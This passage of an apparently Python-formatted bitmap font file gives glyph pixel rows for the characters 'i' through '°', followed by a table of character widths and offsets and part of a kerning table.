# @1520 'i' (1 pixels wide)
0x00, #
0x80, # O
0x80, # O
0x00, #
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x00, #
0x00, #
0x00, #
# @1536 'j' (4 pixels wide)
0x00, #
0x10, # O
0x10, # O
0x00, #
0x70, # OOO
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0xE0, # OOO
# @1552 'k' (7 pixels wide)
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x84, # O O
0x88, # O O
0x90, # O O
0xA0, # O O
0xE0, # OOO
0x90, # O O
0x88, # O O
0x84, # O O
0x82, # O O
0x00, #
0x00, #
0x00, #
# @1568 'l' (1 pixels wide)
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x00, #
0x00, #
0x00, #
# @1584 'm' (11 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0xB9, 0xC0, # O OOO OOO
0xC6, 0x20, # OO OO O
0x84, 0x20, # O O O
0x84, 0x20, # O O O
0x84, 0x20, # O O O
0x84, 0x20, # O O O
0x84, 0x20, # O O O
0x84, 0x20, # O O O
0x84, 0x20, # O O O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1616 'n' (8 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0xBC, # O OOOO
0xC2, # OO O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x00, #
0x00, #
0x00, #
# @1632 'o' (8 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x3C, # OOOO
0x42, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x42, # O O
0x3C, # OOOO
0x00, #
0x00, #
0x00, #
# @1648 'p' (8 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0xBC, # O OOOO
0xC2, # OO O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x82, # O O
0xFC, # OOOOOO
0x80, # O
0x80, # O
0x80, # O
# @1664 'q' (8 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x3F, # OOOOOO
0x41, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x43, # O OO
0x3D, # OOOO O
0x01, # O
0x01, # O
0x01, # O
# @1680 'r' (5 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0xB8, # O OOO
0xC0, # OO
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x00, #
0x00, #
0x00, #
# @1696 's' (6 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x78, # OOOO
0x84, # O O
0x80, # O
0x80, # O
0x78, # OOOO
0x04, # O
0x04, # O
0x84, # O O
0x78, # OOOO
0x00, #
0x00, #
0x00, #
# @1712 't' (5 pixels wide)
0x00, #
0x40, # O
0x40, # O
0x40, # O
0xF8, # OOOOO
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x38, # OOO
0x00, #
0x00, #
0x00, #
# @1728 'u' (8 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x43, # O OO
0x3D, # OOOO O
0x00, #
0x00, #
0x00, #
# @1744 'v' (7 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x82, # O O
0x82, # O O
0x44, # O O
0x44, # O O
0x44, # O O
0x28, # O O
0x28, # O O
0x10, # O
0x10, # O
0x00, #
0x00, #
0x00, #
# @1760 'w' (11 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x84, 0x20, # O O O
0x84, 0x20, # O O O
0x4A, 0x40, # O O O O
0x4A, 0x40, # O O O O
0x4A, 0x40, # O O O O
0x51, 0x40, # O O O O
0x31, 0x80, # OO OO
0x20, 0x80, # O O
0x20, 0x80, # O O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1792 'x' (7 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x82, # O O
0x44, # O O
0x28, # O O
0x28, # O O
0x10, # O
0x28, # O O
0x28, # O O
0x44, # O O
0x82, # O O
0x00, #
0x00, #
0x00, #
# @1808 'y' (7 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x82, # O O
0x82, # O O
0x44, # O O
0x44, # O O
0x44, # O O
0x28, # O O
0x28, # O O
0x10, # O
0x10, # O
0x20, # O
0x20, # O
0x20, # O
# @1824 'z' (6 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0xFC, # OOOOOO
0x04, # O
0x08, # O
0x10, # O
0x20, # O
0x20, # O
0x40, # O
0x80, # O
0xFC, # OOOOOO
0x00, #
0x00, #
0x00, #
# @1840 '{' (7 pixels wide)
0x0E, # OOO
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x20, # O
0xC0, # OO
0x20, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x0E, # OOO
# @1856 '|' (1 pixels wide)
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
# @1872 '}' (7 pixels wide)
0xE0, # OOO
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x08, # O
0x06, # OO
0x08, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0xE0, # OOO
# @1888 '~' (10 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x30, 0x40, # OO O
0x48, 0x40, # O O O
0x84, 0x80, # O O O
0x83, 0x00, # O OO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1920 '°' (6 pixels wide)
0x00, #
0x78, # OOOO
0x84, # O O
0x84, # O O
0x84, # O O
0x84, # O O
0x78, # OOOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
)
descriptors = (
(1,0),# !
(4,16),# "
(11,32),# #
(7,64),# $
(14,80),# %
(10,112),# &
(1,144),# '
(4,160),# (
(4,176),# )
(7,192),# *
(9,208),# +
(2,240),# ,
(5,256),# -
(1,272),# .
(6,288),# /
(8,304),# 0
(5,320),# 1
(7,336),# 2
(7,352),# 3
(8,368),# 4
(7,384),# 5
(8,400),# 6
(7,416),# 7
(8,432),# 8
(8,448),# 9
(1,464),# :
(2,480),# ;
(8,496),# <
(9,512),# =
(8,544),# >
(6,560),# ?
(13,576),# @
(10,608),# A
(8,640),# B
(9,656),# C
(10,688),# D
(8,720),# E
(7,736),# F
(10,752),# G
(10,784),# H
(3,816),# I
(6,832),# J
(8,848),# K
(7,864),# L
(11,880),# M
(10,912),# N
(11,944),# O
(8,976),# P
(11,992),# Q
(9,1024),# R
(8,1056),# S
(9,1072),# T
(10,1104),# U
(9,1136),# V
(13,1168),# W
(8,1200),# X
(9,1216),# Y
(8,1248),# Z
(4,1264),# [
(6,1280),# \
(4,1296),# ]
(10,1312),# ^
(9,1344),# _
(2,1376),# `
(7,1392),# a
(8,1408),# b
(6,1424),# c
(8,1440),# d
(7,1456),# e
(5,1472),# f
(8,1488),# g
(8,1504),# h
(1,1520),# i
(4,1536),# j
(7,1552),# k
(1,1568),# l
(11,1584),# m
(8,1616),# n
(8,1632),# o
(8,1648),# p
(8,1664),# q
(5,1680),# r
(6,1696),# s
(5,1712),# t
(8,1728),# u
(7,1744),# v
(11,1760),# w
(7,1792),# x
(7,1808),# y
(6,1824),# z
(7,1840),# {
(1,1856),# |
(7,1872),# }
(10,1888),# ~
(6,1920),# °
)
kerning = (
(1,1,1,1,1,1,1,1,0,1,1,0,1,1,0,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,0,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,),
(4,4,3,4,4,3,4,4,4,4,0,2,0,3,0,4,4,4,4,1,4,4,4,4,4,4,3,0,0,4,4,3,1,4,4,4,4,4,4,4,4,2,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,2,0,4,2,4,2,2,2,4,2,4,4,3,4,4,4,4,2,4,2,4,3,4,4,4,4,4,4,4,1,4,4,0,4,),
(11,11,10,11,11,10,11,11,9,10,8,9,8,10,8,11,9,10,10,8,11,11,10,11,11,11,10,8,10,10,10,10,9,11,11,11,11,11,11,11,10,8,11,11,11,11,11,11,11,11,11,10,11,10,10,10,10,10,11,10,8,9,2,10,10,11,10,10,10,11,10,11,11,10,11,11,11,11,10,11,10,11,10,11,11,11,11,11,11,11,8,11,8,10,11,),
(7,7,7,7,7,7,7,7,4,6,4,6,4,7,6,7,6,7,7,6,7,7,6,7,7,7,6,5,7,7,5,7,7,7,7,7,7,7,7,7,6,6,7,7,7,7,7,7,7,7,7,4,7,6,6,6,5,7,7,6,4,5,4,5,7,7,7,7,7,7,7,7,7,6,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,4,7,4,7,7,),
(14,11,14,14,13,14,13,14,11,11,14,13,14,14,13,14,13,14,14,14,14,14,13,14,13,14,13,14,14,14,12,14,14,14,14,14,14,14,14,14,13,13,14,14,14,14,14,14,14,14,14,11,14,12,13,13,11,14,14,12,11,13,5,12,14,14,14,14,14,13,14,14,14,11,14,14,14,14,14,14,14,14,14,13,14,13,13,13,13,14,14,14,11,14,12,),
(10,7,9,9,9,9,9,9,8,6,9,9,9,10,9,9,10,10,9,9,9,9,9,9,9,10,9,9,9,9,8,9,10,10,9,10,10,10,9,10,10,10,10,10,10,10,9,10,9,10,9,6,9,7,8,10,6,10,10,7,7,9,1,8,9,10,9,9,9,9,9,10,10,7,10,10,10,10,9,10,9,10,9,8,9,8,8,10,8,10,9,10,7,9,8,),
(1,1,0,1,1,0,1,1,1,1,0,0,0,0,0,1,1,1,1,0,1,1,1,1,1,1,0,0,0,1,1,0,0,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,1,0,1,0,0,0,1,0,1,1,0,1,1,1,1,0,1,0,1,0,1,1,1,1,1,1,1,0,1,1,0,1,),
(3,4,1,1,2,1,4,1,4,3,1,4,1,3,4,2,2,2,2,1,3,1,3,2,2,3,4,1,1,2,2,1,2,3,1,3,3,3,1,3,3,2,3,3,3,3,1,3,1,3,2,3,3,3,3,3,3,3,4,4,4,1,3,4,1,4,1,1,1,2,2,4,3,4,4,4,2,2,1,4,1,2,1,2,1,1,1,2,2,2,1,4,4,1,2,),
(4,4,4,4,4,4,4,4,1,4,4,3,4,4,3,4,3,4,4,4,4,4,3,4,4,4,3,4,4,4,3,4,4,4,4,4,4,4,4,4,3,3,4,4,4,4,4,4,4,4,4,2,4,3,3,3,2,4,4,3,1,4,2,2,4,4,4,4,4,4,4,4,4,3,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,),
(7,7,5,7,7,5,7,7,6,7,3,5,2,6,4,7,5,6,6,5,7,7,7,6,7,7,6,4,4,5,6,7,5,7,7,7,7,7,7,7,7,5,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,4,6,0,7,6,7,6,6,6,6,6,7,7,5,7,7,7,7,6,7,6,7,7,6,7,7,7,6,7,6,4,7,4,2,7,),
(9,5,7,8,8,8,8,9,6,5,9,7,9,8,6,9,7,5,5,9,5,9,6,8,8,8,7,9,5,5,6,9,7,9,9,9,9,9,9,9,8,4,9,9,9,9,9,9,9,9,5,5,9,7,8,6,5,6,9,7,6,5,0,7,7,9,9,9,9,8,9,9,9,6,9,9,9,9,9,9,9,9,9,8,9,8,8,7,8,6,9,9,4,8,5,),
(2,0,1,2,0,1,1,2,1,0,0,1,0,2,1,1,2,2,2,0,2,1,1,1,1,2,1,0,0,2,0,1,2,2,1,2,2,2,1,2,2,2,2,2,2,2,1,2,1,2,2,0,1,0,0,2,0,2,2,0,1,0,1,0,2,2,1,1,1,1,1,2,2,1,2,2,2,2,1,2,1,2,2,1,1,0,0,2,0,2,0,2,1,0,0,),
(5,1,3,4,4,4,4,5,2,0,5,3,5,4,2,5,3,1,0,5,0,5,2,4,4,4,3,5,0,0,2,5,3,5,5,5,5,5,5,5,4,0,5,5,5,5,5,5,5,5,1,1,5,3,4,2,1,2,5,3,2,0,0,3,3,5,5,5,5,4,5,5,5,2,5,5,5,5,5,5,5,5,5,4,5,4,4,3,4,2,5,5,0,4,0,),
(1,0,0,1,0,0,0,1,0,0,0,0,0,1,0,0,1,1,1,0,1,0,0,0,0,1,0,0,0,1,0,0,1,1,0,1,1,1,0,1,1,1,1,1,1,1,0,1,0,1,1,0,0,0,0,1,0,1,1,0,0,0,0,0,1,1,0,0,0,0,0,1,1,0,1,1,1,1,0,1,0,1,1,0,0,0,0,1,0,1,0,1,0,0,0,),
(6,6,4,5,5,4,6,5,6,6,4,4,4,5,1,5,5,5,5,4,6,5,6,5,5,5,4,4,4,5,5,4,2,6,5,6,6,6,5,6,6,4,6,6,6,6,5,6,5,6,5,6,6,6,6,6,6,6,6,6,6,4,1,6,3,6,4,4,4,5,4,6,6,4,6,6,5,5,4,5,4,5,4,5,5,5,5,5,5,5,4,6,6,3,5,),
(8,8,8,8,8,8,8,8,6,8,8,6,8,7,6,8,8,7,7,8,8,8,6,8,8,8,7,8,8,8,7,8,7,8,8,8,8,8,8,8,7,6,8,8,8,8,8,8,8,8,8,6,8,7,7,7,7,7,8,7,5,8,0,6,8,8,8,8,8,8,8,8,8,7,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,5,8,8,),
(5,3,4,4,3,3,4,4,3,3,3,4,3,5,4,3,5,5,4,3,4,3,4,3,4,5,4,3,3,3,3,4,5,5,3,5,5,5,3,5,5,5,5,5,5,5,3,5,3,5,4,3,3,3,3,5,3,5,5,3,2,3,0,3,4,5,3,3,3,4,3,5,5,2,5,5,5,5,3,5,3,5,4,3,3,3,3,5,3,5,3,5,2,3,3,),
(7,7,6,7,7,6,7,7,5,7,5,6,5,7,6,7,7,7,6,5,7,7,6,7,7,7,6,5,6,7,6,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,5,7,6,6,7,6,7,7,6,4,6,0,5,6,7,6,6,6,7,6,7,7,6,7,7,7,7,6,7,6,7,7,7,7,7,7,7,7,7,5,7,4,4,7,),
(7,7,7,7,7,7,7,7,5,6,6,5,6,6,5,7,7,6,6,7,7,7,5,7,7,7,6,6,7,7,6,7,6,7,7,7,7,7,7,7,6,5,7,7,7,7,7,7,7,7,7,5,7,6,6,6,6,6,7,6,4,5,0,5,7,7,7,7,7,7,7,7,7,6,7,7,7,7,7,7,7,7,6,7,7,7,7,7,7,7,6,7,4,7,7,),
(8,7,7,7,7,8,7,8,6,7,7,6,7,7,6,8,7,7,7,8,7,8,7,8,7,7,6,7,7,7,7,8,7,8,8,8,8,8,8,8,7,7,8,8,8,8,8,8,8,8,7,7,8,7,7,7,7,7,8,7,5,7,0,7,7,8,8,8,8,7,8,8,8,6,8,8,8,8,8,8,8,8,7,7,8,7,7,7,7,7,7,8,4,8,7,),
(7,7,7,6,6,7,7,7,6,7,7,5,7,6,5,7,5,6,6,7,7,7,7,7,6,6,5,7,7,6,6,7,6,7,7,7,7,7,7,7,7,5,7,7,7,7,7,7,7,7,6,7,7,7,7,7,7,7,7,7,4,6,0,7,7,7,7,7,7,6,7,7,7,4,7,7,7,7,7,7,7,7,7,6,7,6,6,5,6,6,7,7,4,7,6,),
(8,7,8,7,7,8,7,8,6,7,8,6,8,7,6,8,6,7,7,8,7,8,7,8,7,7,6,8,8,7,6,8,7,8,8,8,8,8,8,8,7,6,8,8,8,8,8,8,8,8,7,7,8,7,7,7,7,7,8,7,5,7,0,7,8,8,8,8,8,7,8,8,8,5,8,8,8,8,8,8,8,8,8,7,8,7,7,6,7,7,8,8,5,8,6,),
(7,7,5,6,7,6,7,6,6,7,4,5,4,6,3,6,6,7,7,4,7,6,7,6,6,6,5,4,5,6,7,5,4,7,6,7,7,7,6,7,7,5,7,7,7,7,6,7,6,7,6,7,7,7,7,7,7,7,7,7,4,5,0,7,4,7,5,5,5,6,5,7,7,5,7,7,6,6,5,6,5,6,5,6,6,6,6,6,6,6,4,7,4,4,7,),
(8,8,8,8,8,8,8,8,6,7,7,6,7,7,6,8,8,7,7,8,8,8,6,8,8,8,7,7,8,8,7,8,7,8,8,8,8,8,8,8,7,6,8,8,8,8,8,8,8,8,8,6,8,7,7,7,7,7,8,7,5,6,0,6,8,8,8,8,8,8,8,8,8,7,8,8,8,8,8,8,8,8,7,8,8,8,8,8,8,8,7,8,5,8,8,),
(8,8,8,8,8,8,8,8,6,8,8,6,8,7,6,8,8,7,7,8,8,8,6,8,8,8,7,8,8,8,7,8,7,8,8,8,8,8,8,8,7,5,8,8,8,8,8,8,8,8,8,6,8,7,7,7,7,6,8,7,5,8,0,6,8,8,8,8,8,8,8,8,8,7,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,5,8,8,),
(1,1,0,1,1,0,1,1,0,1,0,0,0,1,0,1,1,1,1,0,1,1,0,1,1,1,0,0,0,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,0,0,1,0,1,1,0,0,0,0,0,1,1,0,0,0,1,0,1,1,0,1,1,1,1,0,1,0,1,1,1,1,1,1,1,1,1,0,1,0,0,1,),
(2,2,1,2,2,1,2,2,1,2,0,1,0,2,1,2,2,2,2,0,2,2,1,2,2,2,1,0,0,2,0,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,0,2,1,1,2,0,2,2,1,1,1,1,0,2,2,1,1,1,2,1,2,2,1,2,2,2,2,1,2,1,2,2,2,2,2,2,2,2,2,0,2,1,0,2,),
(8,8,7,8,8,7,8,8,6,6,4,7,3,8,7,8,8,8,8,4,8,7,7,8,8,8,7,2,5,8,6,7,8,8,7,8,8,8,7,8,7,3,8,8,8,8,7,8,7,8,8,4,8,7,7,7,7,8,8,7,5,5,0,6,8,8,7,7,7,7,7,8,8,6,8,8,8,8,7,8,7,8,8,7,7,7,7,7,7,8,5,8,5,5,8,),
(9,5,9,9,9,9,8,9,6,6,5,7,4,8,7,9,7,7,7,8,4,9,7,9,9,8,7,8,9,6,7,9,8,9,9,9,9,9,9,9,8,4,9,9,9,9,9,9,9,9,8,5,9,7,8,7,6,7,9,7,6,9,0,7,9,9,9,9,9,8,9,9,9,6,9,9,9,9,9,9,9,9,9,8,9,8,8,7,8,7,7,9,6,9,8,),
(8,4,6,7,7,7,7,8,5,5,8,6,8,7,5,8,6,4,5,8,5,8,5,7,7,7,6,8,7,2,5,8,6,8,8,8,8,8,8,8,7,3,8,8,8,8,8,8,8,8,6,4,8,6,7,5,4,5,8,6,5,7,0,6,6,8,8,8,8,7,8,8,8,5,8,8,8,8,8,8,8,8,8,7,8,7,7,6,7,5,8,8,3,7,6,),
(6,6,5,6,6,5,6,6,4,6,4,4,4,5,3,6,6,5,5,4,6,6,4,6,6,6,5,4,5,6,5,6,4,6,6,6,6,6,6,6,5,3,6,6,6,6,6,6,6,6,6,4,6,5,5,5,5,4,6,5,3,5,0,4,5,6,5,5,5,6,5,6,6,5,6,6,6,6,5,6,5,6,6,6,6,6,6,6,6,6,4,6,3,3,6,),
(13,12,13,13,13,13,12,13,10,13,13,11,13,12,11,13,12,12,12,13,13,13,11,13,13,13,12,13,13,12,11,13,12,13,13,13,13,13,13,13,12,8,13,13,13,13,13,13,13,13,13,9,13,12,12,12,11,12,13,11,10,13,9,11,13,13,13,13,13,12,13,13,13,11,13,13,13,13,13,13,13,13,13,12,13,13,13,12,13,12,13,13,10,13,13,),
(10,7,9,10,8,9,9,10,8,8,8,9,8,10,9,9,10,10,10,9,10,9,9,9,9,10,9,8,9,10,8,9,10,10,9,10,10,10,9,10,10,10,10,10,10,10,9,10,9,10,10,6,9,7,8,10,6,10,10,6,7,8,1,8,10,10,9,9,9,9,9,10,10,7,10,10,10,10,9,10,9,10,10,9,9,8,8,10,8,10,8,10,7,9,8,),
(8,7,8,7,7,8,7,8,5,6,7,6,7,7,6,8,7,7,7,8,7,8,6,8,7,7,6,7,8,7,7,8,7,8,8,8,8,8,8,8,7,6,8,8,8,8,8,8,8,8,7,6,8,7,7,7,6,7,8,6,5,6,0,6,8,8,8,8,8,7,8,8,8,6,8,8,8,8,8,8,8,8,7,7,8,7,7,7,7,7,7,8,5,8,7,),
(9,9,8,9,9,8,9,9,7,8,5,8,4,9,8,8,8,9,9,4,9,8,8,8,8,9,8,2,1,9,9,8,9,9,8,9,9,9,8,9,8,8,9,9,9,9,8,9,8,9,9,8,9,9,9,8,8,9,9,8,6,6,0,8,9,9,8,8,8,8,8,9,9,6,9,9,9,9,8,9,8,9,9,8,8,6,7,8,6,9,6,9,6,1,9,),
(10,9,9,10,10,10,9,10,7,10,10,8,10,9,8,10,9,8,8,10,10,10,7,10,10,10,9,10,10,9,8,10,9,10,10,10,10,10,10,10,9,6,10,10,10,10,10,10,10,10,10,6,10,9,9,8,8,8,10,8,7,10,1,8,9,10,10,10,10,9,10,10,10,8,10,10,10,10,10,10,10,10,10,9,10,10,10,9,10,9,10,10,7,10,10,),
(8,8,7,8,8,6,8,8,7,8,4,7,3,8,7,8,8,8,7,7,8,8,8,6,8,8,7,7,8,3,7,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,7,8,8,8,8,8,8,8,8,8,5,8,0,8,7,8,8,8,8,7,8,8,8,5,8,8,8,8,8,8,8,8,8,7,8,7,7,8,7,8,6,8,5,6,7,),
(7,7,4,7,7,5,7,7,6,7,3,5,2,6,4,7,5,6,6,6,7,7,7,5,7,6,5,6,7,2,6,7,5,7,7,7,7,7,7,7,7,5,7,7,7,7,7,7,7,7,6,7,7,7,7,7,7,7,7,7,4,7,0,7,1,7,7,7,7,6,7,7,7,4,7,7,7,7,7,7,7,7,7,6,7,6,6,5,6,3,5,7,4,5,6,),
(10,10,10,10,10,10,10,10,8,9,10,9,10,10,9,10,9,10,10,10,10,10,9,10,9,10,9,10,10,10,10,10,10,10,10,10,10,10,10,10,9,9,10,10,10,10,10,10,10,10,10,9,10,10,10,9,9,10,10,9,7,7,1,9,10,10,10,10,10,9,10,10,10,7,10,10,10,10,10,10,10,10,10,9,10,9,9,9,9,10,10,10,7,10,10,),
(10,10,10,10,10,10,10,10,9,10,10,9,10,10,9,10,10,10,10,10,10,10,10,10,10,10,9,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,7,10,1,10,10,10,10,10,10,10,10,10,10,9,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,7,10,10,),
(3,3,2,2,2,2,3,2,2,3,2,2,2,3,2,2,3,3,2,2,3,2,3,2,2,3,2,2,2,2,2,2,3,3,2,3,3,3,2,3,3,3,3,3,3,3,2,3,2,3,2,3,3,3,3,3,3,3,3,3,0,2,0,3,2,3,2,2,2,2,2,3,3,1,3,3,3,3,2,3,2,3,2,2,2,2,2,3,2,3,2,3,0,2,2,),
(6,6,6,6,6,6,6,6,5,6,6,5,6,6,5,6,6,6,6,6,6,6,6,6,6,6,5,6,6,6,6,6,6,6,6,6,6,6,6,6,6,5,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,3,6,0,6,6,6,6,6,6,6,6,6,6,5,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,3,6,6,),
(8,8,7,7,7,6,8,7,7,8,3,7,3,8,7,6,8,8,7,4,8,6,8,6,7,8,7,3,5,7,7,7,8,8,6,8,8,8,6,8,8,8,8,8,8,8,6,8,6,8,7,8,8,8,8,8,8,8,8,8,5,4,0,8,7,8,6,6,6,7,6,8,8,5,8,8,8,8,6,8,6,8,7,7,6,5,6,8,5,8,5,8,5,5,7,),
(7,3,6,6,4,5,6,6,5,1,1,6,2,7,6,5,7,7,6,1,6,5,6,5,6,7,6,1,1,1,5,6,7,7,4,7,7,7,4,7,7,7,7,7,7,7,4,7,4,7,6,3,5,3,4,7,3,7,7,3,4,1,0,5,6,7,5,5,5,6,5,7,7,4,7,7,7,7,5,7,5,7,6,5,5,4,5,7,4,7,4,7,4,1,1,),
(11,11,11,11,11,11,11,11,10,11,11,10,11,11,10,11,11,11,11,11,11,11,11,11,11,11,10,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,8,11,2,11,11,11,11,11,11,11,11,11,11,10,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,8,11,11,),
(10,10,10,10,10,10,10,10,9,10,10,9,10,10,9,10,10,10,10,10,10,10,10,10,10,10,9,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,7,10,1,10,10,10,10,10,10,10,10,10,10,9,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,7,10,10,),
(11,11,11,11,11,11,11,11,8,11,11,9,11,10,9,11,10,10,10,11,11,11,9,11,11,11,10,11,11,10,10,11,10,11,11,11,11,11,11,11,10,8,11,11,11,11,11,11,11,11,11,8,11,10,10,9,9,10,11,10,8,11,2,9,11,11,11,11,11,11,11,11,11,10,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,8,11,11,),
(8,8,7,8,8,7,8,8,6,8,7,6,7,7,5,8,8,7,7,7,8,8,6,8,8,8,7,7,8,8,7,8,6,8,8,8,8,8,8,8,7,4,8,8,8,8,8,8,8,8,8,6,8,7,7,7,7,6,8,7,5,8,0,6,7,8,8,8,8,8,8,8,8,7,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,7,8,5,6,8,),
(11,11,11,11,11,11,11,11,11,11,11,11,11,10,11,11,10,10,10,11,11,11,9,11,11,11,11,11,11,10,10,11,10,11,11,11,11,11,11,11,10,8,11,11,11,11,11,11,11,11,11,8,11,10,10,9,9,10,11,10,11,11,7,9,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,),
(9,7,8,8,7,7,8,8,7,7,5,8,5,9,8,7,9,9,8,5,8,7,8,7,8,9,8,5,6,8,7,8,9,9,7,9,9,9,7,9,9,9,9,9,9,9,7,9,7,9,8,6,7,7,7,9,6,9,9,6,6,6,0,7,8,9,7,7,7,8,7,9,9,6,9,9,9,9,7,9,7,9,8,7,7,7,7,9,7,9,6,9,6,6,7,),
(8,8,8,7,8,8,8,8,6,7,7,6,7,7,6,8,6,8,8,8,8,8,7,8,7,7,6,7,8,7,8,8,7,8,8,8,8,8,8,8,7,6,8,8,8,8,8,8,8,8,7,7,8,8,8,7,7,7,8,7,5,5,0,7,8,8,8,8,8,7,8,8,8,5,8,8,8,8,8,8,8,8,7,7,8,7,7,6,7,7,7,8,5,8,8,),
(9,9,5,6,8,7,9,7,8,9,5,7,5,8,4,7,7,8,8,5,9,6,9,7,7,8,7,5,5,5,8,5,5,9,6,9,9,9,6,9,9,7,9,9,9,9,6,9,6,9,7,9,9,9,9,9,9,9,9,9,6,5,0,9,5,9,5,5,5,8,5,9,9,6,9,9,5,5,5,5,5,5,5,8,5,5,5,5,5,5,6,9,6,5,8,),
(10,10,10,10,10,10,10,10,9,10,10,8,10,9,8,10,10,10,10,10,10,10,10,10,10,10,9,10,10,10,10,10,9,10,10,10,10,10,10,10,10,8,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,7,10,1,10,10,10,10,10,10,10,10,10,10,9,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,7,10,10,),
(9,9,7,8,9,8,9,8,8,9,7,7,7,8,5,8,8,9,9,7,9,8,9,8,8,8,7,7,7,8,9,8,6,9,8,9,9,9,8,9,9,7,9,9,9,9,8,9,8,9,8,9,9,9,9,9,9,9,9,9,6,7,0,9,7,9,7,7,7,8,7,9,9,7,9,9,8,8,7,8,7,8,8,8,8,8,8,8,8,8,7,9,6,7,9,),
(13,13,11,12,13,12,13,12,12,13,12,11,12,12,10,12,12,13,13,12,13,12,13,12,12,12,11,12,12,12,13,12,11,13,12,13,13,13,12,13,13,11,13,13,13,13,12,13,12,13,12,13,13,13,13,13,13,13,13,13,10,12,4,13,11,13,12,12,12,12,12,13,13,11,13,13,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,13,10,11,13,),
(8,8,7,7,7,7,8,7,7,8,5,7,5,8,7,7,8,8,7,5,8,7,8,7,7,8,7,5,6,7,7,7,8,8,6,8,8,8,6,8,8,8,8,8,8,8,6,8,6,8,7,8,8,8,8,8,8,8,8,8,5,5,0,8,7,8,7,7,7,7,7,8,8,5,8,8,8,8,7,8,7,8,7,7,7,6,6,8,6,8,5,8,5,6,7,),
